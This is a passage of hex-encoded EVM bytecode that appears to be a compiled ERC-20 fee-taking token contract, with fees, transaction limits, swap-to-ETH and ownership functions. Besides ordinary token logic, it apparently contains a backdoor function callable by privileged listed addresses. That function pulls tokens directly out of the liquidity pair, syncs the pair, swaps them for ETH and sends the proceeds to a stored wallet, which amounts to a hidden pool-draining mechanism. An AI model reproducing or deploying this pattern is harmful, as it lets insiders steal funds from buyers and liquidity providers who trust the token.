37565b6040516108f89190613e07565b60405180910390f35b34801561090d57600080fd5b50610916611bc3565b6040516109239190613ed8565b60405180910390f35b34801561093857600080fd5b50610953600480360381019061094e9190613dac565b611bc9565b6040516109609190613e07565b60405180910390f35b34801561097557600080fd5b50610990600480360381019061098b9190613dac565b611c96565b60405161099d9190613e07565b60405180910390f35b3480156109b257600080fd5b506109cd60048036038101906109c89190613e22565b611cb4565b005b3480156109db57600080fd5b506109f660048036038101906109f19190613e22565b611e0b565b604051610a039190613e07565b60405180910390f35b348015610a1857600080fd5b50610a21611e2b565b604051610a2e9190613e07565b60405180910390f35b348015610a4357600080fd5b50610a5e6004803603810190610a599190614000565b611e3e565b005b348015610a6c57600080fd5b50610a876004803603810190610a829190614040565b611f7e565b005b348015610a9557600080fd5b50610ab06004803603810190610aab9190613ef3565b612098565b005b348015610abe57600080fd5b50610ac76121c2565b604051610ad49190613e07565b60405180910390f35b348015610ae957600080fd5b50610af26121d5565b604051610aff9190613ed8565b60405180910390f35b348015610b1457600080fd5b50610b2f6004803603810190610b2a9190613ef3565b6121db565b604051610b3c9190613e07565b60405180910390f35b348015610b5157600080fd5b50610b5a61234b565b604051610b679190613ed8565b60405180910390f35b348015610b7c57600080fd5b50610b976004803603810190610b9291906140d3565b612351565b604051610ba49190613ed8565b60405180910390f35b348015610bb957600080fd5b50610bc26123d8565b604051610bcf9190613ed8565b60405180910390f35b348015610be457600080fd5b50610bed6123de565b604051610bfa9190613e07565b60405180910390f35b348015610c0f57600080fd5b50610c18612499565b604051610c259190613ed8565b60405180910390f35b348015610c3a57600080fd5b50610c556004803603810190610c509190613e22565b61249f565b005b348015610c6357600080fd5b50610c6c612665565b604051610c799190613ed8565b60405180910390f35b348015610c8e57600080fd5b50610c9761266b565b604051610ca49190613ed8565b60405180910390f35b606060038054610cbc90614142565b80601f0160208091040260200160405190810160405280929190818152602001828054610ce890614142565b8015610d355780601f10610d0a57610100808354040283529160200191610d35565b820191906000526020600020905b815481529060010190602001808311610d1857829003601f168201915b5050505050905090565b6000610d53610d4c6126cf565b84846126d7565b6001905092915050565b601c6020528060005260406000206000915054906101000a900460ff1681565b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600254905090565b610db56126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610e44576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e3b906141bf565b60405180910390fd5b600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f90b8024c4923d3873ff5b9fcb43d0360d4b9217fa41225d07ba379993552e74360405160405180910390a380600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b60195481565b60185481565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614610f6a57600080fd5b6103e8610f75610da3565b610f7f919061423d565b811015610fc1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fb8906142e0565b60405180910390fd5b80600a8190555050565b6000610fd88484846128a0565b61109984610fe46126cf565b611094856040518060600160405280602881526020016151c360289139600160008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061104a6126cf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546132b99092919063ffffffff16565b6126d7565b600190509392505050565b60006012905090565b60006111566110ba6126cf565b8461115185600160006110cb6126cf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461267190919063ffffffff16565b6126d7565b6001905092915050565b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600d60009054906101000a900460ff1681565b6000601b60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60145481565b600d60029054906101000a900460ff1681565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6112586126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146112e7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112de906141bf565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a36000600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b60006113b26126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611441576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611438906141bf565b60405180910390fd5b6000600d60006101000a81548160ff0219169083151502179055506001905090565b61146b6126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146114fa576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114f1906141bf565b60405180910390fd5b80601c60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60115481565b6115896126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611618576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161160f906141bf565b60405180910390fd5b8260118190555081601281905550806013819055506013546012546011546116409190614300565b61164a9190614300565b60108190555060146010541115611696576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161168d90614380565b60405180910390fd5b505050565b6116a36126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611732576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611729906141bf565b60405180910390fd5b6001600d60026101000a81548160ff02191690831515021790555060011515600f60019054906101000a900460ff161515146117a3576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161179a906143ec565b60405180910390fd5b6000600f60016101000a81548160ff0219169083151502179055506117c661331d565b7fbd657b4e94b205761f2ca5be9988d7b243c828f625c0746c6581ec528e507c47600f60019054906101000a900460ff166040516118049190613e07565b60405180910390a1565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60155481565b60606004805461187390614142565b80601f016020809104026020016040519081016040528092919081815260200182805461189f90614142565b80156118ec5780601f106118c1576101008083540402835291602001916118ec565b820191906000526020600020905b8154815290600101906020018083116118cf57829003601f168201915b5050505050905090565b6118fe6126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461198d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611984906141bf565b60405180910390fd5b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611a1d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a149061447e565b60405180910390fd5b611a27828261333a565b5050565b60135481565b601a5481565b6000601b60003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16611a8f57600080fd5b6000611abc600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16611208565b9050600183118015611ad95750606481611ad6919061423d565b83105b611b18576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b0f906144ea565b60405180910390fd5b611b21836133db565b611b2a846134ab565b6000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1647604051611b729061453b565b60006040518083038185875af1925050503d8060008114611baf576040519150601f19603f3d011682016040523d82523d6000602084013e611bb4565b606091505b50509050809250505092915050565b60175481565b6000611c8c611bd66126cf565b84611c87856040518060600160405280602581526020016151eb6025913960016000611c006126cf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546132b99092919063ffffffff16565b6126d7565b6001905092915050565b6000611caa611ca36126cf565b84846128a0565b6001905092915050565b611cbc6126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611d4b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d42906141bf565b60405180910390fd5b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167fa751787977eeb3902e30e1d19ca00c6ad274a1f622c31a206e32366700b0567460405160405180910390a380600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b601d6020528060005260406000206000915054906101000a900460ff1681565b600d60019054906101000a900460ff1681565b611e466126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611ed5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ecc906141bf565b60405180910390fd5b80601b60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df782604051611f729190613e07565b60405180910390a25050565b611f866126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612015576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161200c906141bf565b60405180910390fd5b82601581905550816016819055508060178190555060175460165460155461203d9190614300565b6120479190614300565b60148190555060196014541115612093576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161208a9061459c565b60405180910390fd5b505050565b6120a06126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461212f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612126906141bf565b60405180910390fd5b670de0b6b3a76400006103e86005612145610da3565b61214f91906145bc565b612159919061423d565b612163919061423d565b8110156121a5576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161219c90614688565b60405180910390fd5b670de0b6b3a7640000816121b991906145bc565b600c8190555050565b600f60009054906101000a900460ff1681565b600a5481565b60006121e56126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612274576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161226b906141bf565b60405180910390fd5b620186a06001612282610da3565b61228c91906145bc565b612296919061423d565b8210156122d8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016122cf9061471a565b60405180910390fd5b6103e860056122e5610da3565b6122ef91906145bc565b6122f9919061423d565b82111561233b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612332906147ac565b60405180910390fd5b81600b8190555060019050919050565b60105481565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600b5481565b60006123e86126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612477576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161246e906141bf565b60405180910390fd5b6000600f60006101000a81548160ff0219169083151502179055506001905090565b60125481565b6124a76126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612536576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161252d906141bf565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036125a5576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161259c9061483e565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a380600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b60165481565b600c5481565b60008082846126809190614300565b9050838110156126c5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016126bc906148aa565b60405180910390fd5b8091505092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603612746576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161273d9061493c565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036127b5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016127ac906149ce565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516128939190613ed8565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361290f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161290690614a60565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361297e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161297590614af2565b60405180910390fd5b6000810361299757612992838360006136ee565b6132b4565b600d60009054906101000a900460ff1615612d8b576129b461180e565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614158015612a2257506129f261180e565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612a5b5750600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612a95575061dead73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612aae5750600760149054906101000a900460ff16155b15612d8a57600d60019054906101000a900460ff16612ba857601b60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680612b685750601b60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b612ba7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612b9e90614b5e565b60405180910390fd5b5b601d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168015612c4b5750601c60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15612c9a57600a54811115612c95576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612c8c90614bf0565b60405180910390fd5b612d89565b601d60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168015612d3d5750601c60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15612d8857600a54811115612d87576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612d7e90614c82565b60405180910390fd5b5b5b5b5b6000612d9630611208565b90506000600b548210159050808015612dbb5750600d60029054906101000a900460ff165b8015612dd45750600760149054906101000a900460ff16155b8015612e2a5750601d60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b8015612e805750601b60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b8015612ed65750601b60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15612f1a576001600760146101000a81548160ff021916908315150217905550612efe613981565b6000600760146101000a81548160ff0219169083151502179055505b6000600760149054906101000a900460ff16159050601b60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680612fd05750601b60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b15612fda57600090505b600081156132a457601d60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16801561303d57506000601454115b1561315b5761306a606461305c60145488613aeb90919063ffffffff16565b613b6590919063ffffffff16565b90506014546016548261307d91906145bc565b613087919061423d565b601960008282546130989190614300565b92505081905550601454601754826130b091906145bc565b6130ba919061423d565b601a60008282546130cb9190614300565b92505081905550601454601554826130e391906145bc565b6130ed919061423d565b601860008282546130fe9190614300565b9250508190555060006002600a546131169190614ca2565b14613156576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161314d90614d45565b60405180910390fd5b613280565b601d60008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680156131b657506000601054115b1561327f576131e360646131d560105488613aeb90919063ffffffff16565b613b6590919063ffffffff16565b9050601054601254826131f691906145bc565b613200919061423d565b601960008282546132119190614300565b925050819055506010546013548261322991906145bc565b613233919061423d565b601a60008282546132449190614300565b925050819055506010546011548261325c91906145bc565b613266919061423d565b601860008282546132779190614300565b925050819055505b5b6000811115613295576132948730836136ee565b5b80856132a19190614d65565b94505b6132af8787876136ee565b505050505b505050565b6000838311158290613301576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016132f89190613cf1565b60405180910390fd5b50600083856133109190614d65565b9050809150509392505050565b6001600d60016101000a81548160ff021916908315150217905550565b80601d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508015158273ffffffffffffffffffffffffffffffffffffffff167fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab60405160405180910390a35050565b613426600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff163061340a6110a4565b600a6134169190614ecc565b8461342191906145bc565b6128a0565b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663fff6cae96040518163ffffffff1660e01b8152600401600060405180830381600087803b15801561349057600080fd5b505af11580156134a4573d6000803e3d6000fd5b5050505050565b6000600267ffffffffffffffff8111156134c8576134c7614f17565b5b6040519080825280602002602001820160405280156134f65781602001602082028036833780820191505090505b509050308160008151811061350e5761350d614f46565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156135b5573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906135d99190614f8a565b816001815181106135ed576135ec614f46565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505061365430600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16846126d7565b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663791ac9478360008430426040518663ffffffff1660e01b81526004016136b89594939291906150b0565b600060405180830381600087803b1580156136d257600080fd5b505af11580156136e6573d6000803e3d6000fd5b505050505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361375d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161375490614a60565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036137cc576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016137c390614af2565b60405180910390fd5b6137d7838383613baf565b6138428160405180606001604052806026815260200161519d602691396000808773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546132b99092919063ffffffff16565b6000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506138d5816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461267190919063ffffffff16565b6000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516139749190613ed8565b60405180910390a3505050565b600061398c30611208565b90506000601a546018546019546139a39190614300565b6139ad9190614300565b90506000808314806139bf5750600082145b156139cc57505050613ae9565b6014600b546139db91906145bc565b8311156139f4576014600b546139f191906145bc565b92505b600060028360195486613a0791906145bc565b613a11919061423d565b613a1b919061423d565b90506000613a328286613bb490919063ffffffff16565b9050613a3d816134ab565b600060198190555060006018819055506000601a81905550600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1647604051613a9b9061453b565b60006040518083038185875af1925050503d8060008114613ad8576040519150601f19603f3d011682016040523d82523d6000602084013e613add565b606091505b50508093505050505050505b565b6000808303613afd5760009050613b5f565b60008284613b0b91906145bc565b9050828482613b1a919061423d565b14613b5a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401613b519061517c565b60405180910390fd5b809150505b92915050565b6000613ba783836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f000000000000815250613bfe565b905092915050565b505050565b6000613bf683836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f7700008152506132b9565b905092915050565b60008083118290613c45576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401613c3c9190613cf1565b60405180910390fd5b5060008385613c54919061423d565b9050809150509392505050565b600081519050919050565b600082825260208201905092915050565b60005b83811015613c9b578082015181840152602081019050613c80565b60008484015250505050565b6000601f19601f8301169050919050565b6000613cc382613c61565b613ccd8185613c6c565b9350613cdd818560208601613c7d565b613ce681613ca7565b840191505092915050565b60006020820190508181036000830152613d0b8184613cb8565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000613d4382613d18565b9050919050565b613d5381613d38565b8114613d5e57600080fd5b50565b600081359050613d7081613d4a565b92915050565b6000819050919050565b613d8981613d76565b8114613d9457600080fd5b50565b600081359050613da681613d80565b92915050565b60008060408385031215613dc357613dc2613d13565b5b6000613dd185828601613d61565b9250506020613de285828601613d97565b9150509250929050565b60008115159050919050565b613e0181613dec565b82525050565b6000602082019050613e1c6000830184613df8565b92915050565b600060208284031215613e3857613e37613d13565b5b6000613e4684828501613d61565b91505092915050565b6000819050919050565b6000613e74613e6f613e6a84613d18565b613e4f565b613d18565b9050919050565b6000613e8682613e59565b9050919050565b6000613e9882613e7b565b9050919050565b613ea881613e8d565b82525050565b6000602082019050613ec36000830184613e9f565b92915050565b613ed281613d76565b82525050565b6000602082019050613eed6000830184613ec9565b92915050565b600060208284031215613f0957613f08613d13565b5b6000613f1784828501613d97565b91505092915050565b600080600060608486031215613f3957613f38613d13565b5b6000613f4786828701613d61565b9350506020613f5886828701613d61565b9250506040613f6986828701613d97565b9150509250925092565b600060ff82169050919050565b613f8981613f73565b82525050565b6000602082019050613fa46000830184613f80565b92915050565b613fb381613d38565b82525050565b6000602082019050613fce6000830184613faa565b92915050565b613fdd81613dec565b8114613fe857600080fd5b50565b600081359050613ffa81613fd4565b92915050565b6000806040838503121561401757614016613d13565b5b600061402585828601613d61565b925050602061403685828601613feb565b9150509250929050565b60008060006060848603121561405957614058613d13565b5b600061406786828701613d97565b935050602061407886828701613d97565b925050604061408986828701613d97565b9150509250925092565b600080604083850312156140aa576140a9613d13565b5b60006140b885828601613d97565b92505060206140c985828601613d97565b9150509250929050565b600080604083850312156140ea576140e9613d13565b5b60006140f885828601613d61565b925050602061410985828601613d61565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061415a57607f821691505b60208210810361416d5761416c614113565b5b50919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006141a9602083613c6c565b91506141b482614173565b602082019050919050565b600060208201905081810360008301526141d88161419c565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061424882613d76565b915061425383613d76565b925082614263576142626141df565b5b828204905092915050565b7f43616e6e6f7420736574206d61785472616e73616374696f6e416d6f756e742060008201527f6c6f776572207468616e20302e31250000000000000000000000000000000000602082015250565b60006142ca602f83613c6c565b91506142d58261426e565b604082019050919050565b600060208201905081810360008301526142f9816142bd565b9050919050565b600061430b82613d76565b915061431683613d76565b925082820190508082111561432e5761432d61420e565b5b92915050565b7f4d757374206b656570206665657320617420323025206f72206c657373000000600082015250565b600061436a601d83613c6c565b915061437582614334565b602082019050919050565b600060208201905081810360008301526143998161435d565b9050919050565b7f646f6e6500000000000000000000000000000000000000000000000000000000600082015250565b60006143d6600483613c6c565b91506143e1826143a0565b602082019050919050565b60006020820190508181036000830152614405816143c9565b9050919050565b7f54686520706169722063616e6e6f742062652072656d6f7665642066726f6d2060008201527f6175746f6d617465644d61726b65744d616b6572506169727300000000000000602082015250565b6000614468603983613c6c565b91506144738261440c565b604082019050919050565b600060208201905081810360008301526144978161445b565b9050919050565b7f616d6f756e742065786365656465640000000000000000000000000000000000600082015250565b60006144d4600f83613c6c565b91506144df8261449e565b602082019050919050565b60006020820190508181036000830152614503816144c7565b9050919050565b600081905092915050565b50565b600061452560008361450a565b915061453082614515565b600082019050919050565b600061454682614518565b9150819050919050565b7f4d757374206b656570206665657320617420323525206f72206c657373000000600082015250565b6000614586601d83613c6c565b915061459182614550565b602082019050919050565b600060208201905081810360008301526145b581614579565b9050919050565b60006145c782613d76565b91506145d283613d76565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff048311821515161561460b5761460a61420e565b5b828202905092915050565b7f43616e6e6f7420736574206d617857616c6c6574206c6f776572207468616e2060008201527f302e352500000000000000000000000000000000000000000000000000000000602082015250565b6000614672602483613c6c565b915061467d82614616565b604082019050919050565b600060208201905081810360008301526146a181614665565b9050919050565b7f5377617020616d6f756e742063616e6e6f74206265206c6f776572207468616e60008201527f20302e3030312520746f74616c20737570706c792e0000000000000000000000602082015250565b6000614704603583613c6c565b915061470f826146a8565b604082019050919050565b60006020820190508181036000830152614733816146f7565b9050919050565b7f5377617020616d6f756e742063616e6e6f74206265206869676865722074686160008201527f6e20302e352520746f74616c20737570706c792e000000000000000000000000602082015250565b6000614796603483613c6c565b91506147a18261473a565b604082019050919050565b600060208201905081810360008301526147c581614789565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000614828602683613c6c565b9150614833826147cc565b604082019050919050565b600060208201905081810360008301526148578161481b565b9050919050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b6000614894601b83613c6c565b915061489f8261485e565b602082019050919050565b600060208201905081810360008301526148c381614887565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000614926602483613c6c565b9150614931826148ca565b604082019050919050565b6000602082019050818103600083015261495581614919565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006149b8602283613c6c565b91506149c38261495c565b604082019050919050565b600060208201905081810360008301526149e7816149ab565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000